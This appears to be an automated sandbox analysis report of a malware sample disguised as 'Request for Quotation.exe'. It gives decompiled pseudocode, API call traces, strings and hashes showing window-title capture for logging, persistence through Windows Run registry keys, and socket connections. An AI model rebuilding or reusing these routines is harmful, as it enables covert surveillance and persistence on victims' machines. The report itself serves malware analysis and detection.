                                                                                				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                                                                				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                                                                				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                                                                				E00413A29(_t29, _t29, _t29, __imp__tolower);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
                                                                                				_t73 = 0;
                                                                                				if(E00401838( &_v40) <= 0) {
                                                                                					L5:
                                                                                					E004017DD( &_v40);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					goto L6;
                                                                                				}
                                                                                				_t82 = 0;
                                                                                				while(1) {
                                                                                					_t37 = E0040180C( &_v40, 0, _t82);
                                                                                					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                                                                					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                                                                						break;
                                                                                					}
                                                                                					_t73 = _t73 + 1;
                                                                                					_t82 = _t73 & 0x0000ffff;
                                                                                					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                				__eflags = _a20;
                                                                                				if(_a20 != 0) {
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					asm("repne scasb");
                                                                                					_t66 =  !( &_v24 | 0xffffffff);
                                                                                					_t83 = _t37 - _t66;
                                                                                					_t67 = _t66 >> 2;
                                                                                					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                                                                					__eflags = _t70;
                                                                                					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                                                                				}
                                                                                				E004017DD( &_v40);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 1;
                                                                                			}















                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                                                                • GetWindowTextA.USER32 ref: 00412FB8
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                                                                • String ID:
                                                                                • API String ID: 3496238640-0
                                                                                • Opcode ID: 1ef6a0afe55f8d1f9f56990fe4bd3b2f116220d55119b289a45dde596ddb661c
                                                                                • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                                                                • Opcode Fuzzy Hash: 1ef6a0afe55f8d1f9f56990fe4bd3b2f116220d55119b289a45dde596ddb661c
                                                                                • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                                                                  • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                                                                  • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                                                                  • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                                                                  • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                                                                  • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                                                                  • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                                                                  • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                                                                  • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                                                                  • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                                                                  • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                                                                  • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                                                                  • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040543A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                                                                • Sleep.KERNEL32(00000064), ref: 004054D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                                                                • String ID: [ $ ]
                                                                                • API String ID: 3011177377-93608704
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                                                                • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                                                                • _itoa.MSVCRT ref: 0040377A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                                                                • String ID:
                                                                                • API String ID: 3966177967-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                                                                				char _v20;
                                                                                				void* _t13;
                                                                                				void* _t15;
                                                                                				char* _t26;
                                                                                				void* _t27;
                                                                                				void* _t32;
                                                                                				void* _t35;
                                                                                
                                                                                				_t26 = "\"";
                                                                                				if(_a4 == 1) {
                                                                                					_t35 = _t27 - 0x10;
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t3 =  &_a16; // 0x415a24
                                                                                					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					_t27 = _t35 + 0x38;
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                				}
                                                                                				if(_a8 == 1) {
                                                                                					_t32 = _t27 - 0x10;
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t7 =  &_a16; // 0x415a24
                                                                                					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					_t27 = _t32 + 0x38;
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                				}
                                                                                				if(_a12 == 1) {
                                                                                					L0041416A();
                                                                                					L00414146();
                                                                                					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
                                                                                					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                                                                					return _t15;
                                                                                				}
                                                                                				return _t13;
                                                                                			}











                                                                                APIs
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407DA4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                  • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B7D5
                                                                                  • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B7E3
                                                                                  • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                  • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28), ref: 0040B801
                                                                                  • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 0040B810
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407DBE
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407DC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407DE8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407E02
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe,0041BA28,00415A24), ref: 00407E0C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\Request for Quotation.exe), ref: 00407E2C
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                                                                • $ZA, xrefs: 00407DD0, 00407D8C
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 00407D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID: $ZA$C:\Users\user\Desktop\Request for Quotation.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                                                                • API String ID: 111787555-3992257931
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				struct tagPOINT _v12;
                                                                                				void* _t16;
                                                                                				struct HMENU__* _t17;
                                                                                				void* _t20;
                                                                                				void* _t24;
                                                                                
                                                                                				_t16 = _a8 - 1;
                                                                                				if(_t16 == 0) {
                                                                                					_t17 = CreatePopupMenu();
                                                                                					 *0x41c1f0 = _t17;
                                                                                					AppendMenuA(_t17, 0, 0, "Close");
                                                                                					L15:
                                                                                					return 0;
                                                                                				}
                                                                                				_t20 = _t16 - 0x110;
                                                                                				if(_t20 == 0) {
                                                                                					if(_a12 != 0) {
                                                                                						goto L15;
                                                                                					}
                                                                                					Shell_NotifyIconA(2, 0x41c200);
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				if(_t20 == 0x2f0) {
                                                                                					_t24 = _a16 - 0x201;
                                                                                					if(_t24 == 0) {
                                                                                						if(IsWindowVisible( *0x41c1fc) == 0) {
                                                                                							ShowWindow( *0x41c1fc, 9);
                                                                                							SetForegroundWindow( *0x41c1fc);
                                                                                						} else {
                                                                                							ShowWindow( *0x41c1fc, 0);
                                                                                						}
                                                                                						goto L15;
                                                                                					}
                                                                                					if(_t24 == 3) {
                                                                                						GetCursorPos( &_v12);
                                                                                						SetForegroundWindow(_a4);
                                                                                						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
                                                                                						goto L15;
                                                                                					}
                                                                                					_push(_a16);
                                                                                					_push(_a12);
                                                                                					_push(0x401);
                                                                                					L4:
                                                                                					return DefWindowProcA(_a4, ??, ??, ??);
                                                                                				}
                                                                                				_push(_a16);
                                                                                				_push(_a12);
                                                                                				_push(_a8);
                                                                                				goto L4;
                                                                                			}









                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                                                                • GetCursorPos.USER32(?), ref: 00413C97
                                                                                • SetForegroundWindow.USER32(?), ref: 00413CA0
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                                                                • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                                                                • ExitProcess.KERNEL32 ref: 00413D14
                                                                                • CreatePopupMenu.USER32 ref: 00413D1C
                                                                                • AppendMenuA.USER32 ref: 00413D31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                • String ID: Close
                                                                                • API String ID: 1657328048-3535843008
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                  • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                                                                  • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                                                                  • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                                                                  • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
